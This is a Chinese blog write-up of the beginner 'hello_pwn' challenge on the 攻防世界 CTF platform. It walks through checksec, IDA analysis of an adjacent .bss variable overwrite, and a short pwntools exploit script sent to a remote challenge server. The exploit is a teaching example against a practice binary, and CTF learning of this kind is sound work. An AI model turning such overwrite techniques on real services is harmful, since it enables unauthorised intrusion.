攻防世界misc新手_攻防世界pwn新手练习(hello_pwn)

284943a3e67b6b0f34cae4f8df3400e5.png

拿到程序后,我们首先checksec一下

0ca682a984f50c114f50e9f28743bd86.png

可以看到是64位程序,好的是这次只开了NX(堆栈不可执行),ok,我们跑一下程序看看

eaed970dfe78a93fbea5273181b3a1f5.png

可以看到它是一个输入,然后就啥都没有了emmmm....好吧,咱们继续放到IDA里面看看

88c48da7a0cbc8510304071ca90e4c8a.png

通过观察我们可以发现当dword_60106C这个变量的值为1853186401时,程序会进入一个函数中,而这个函数的作用则是抓取flag。

好了,很明显了,接下来的问题时我们如何去改变这个变量的值。通过双击查看我们可以知道dword60106Cunk601068这俩变量都在.bss段,并且dword60106C就在离unk601068四个位置的地方,而凑巧的时unk601068时可以被控制的,它是由我们输入的,而输入点给了我们10个长度的输入权限,那正好,我们可以借此覆盖掉dword60106C使它变成我们需要的数值

fa604b7753624334b302323910e443d4.png

ok了,分析结束,上exp

```python from pwn import *

context.log_level = 'debug'

r = remote('111.198.29.45', 42136)

payload = 'A' * 4 + p64(1853186401)

r.recvuntil("lets get helloworld for bofn") r.sendline(payload) print r.recv() ``` 我们瞅一下运行结果

be4c758c487e0957b8fa65c9dd06848f.png

最后放一下我的博客(http://www.sailingplace.cn),有兴趣的可以来看看(萌新的小天地,轻点喷)

ok,nice!我们下次见。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值